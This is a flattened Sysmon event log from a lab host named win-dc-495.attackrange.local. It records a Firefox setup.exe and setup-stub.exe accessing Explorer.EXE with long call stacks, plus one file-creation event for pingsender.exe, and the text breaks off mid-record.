C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\pingsender.exe2021-01-18 13:59:52.489 10341000x800000000000000015245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 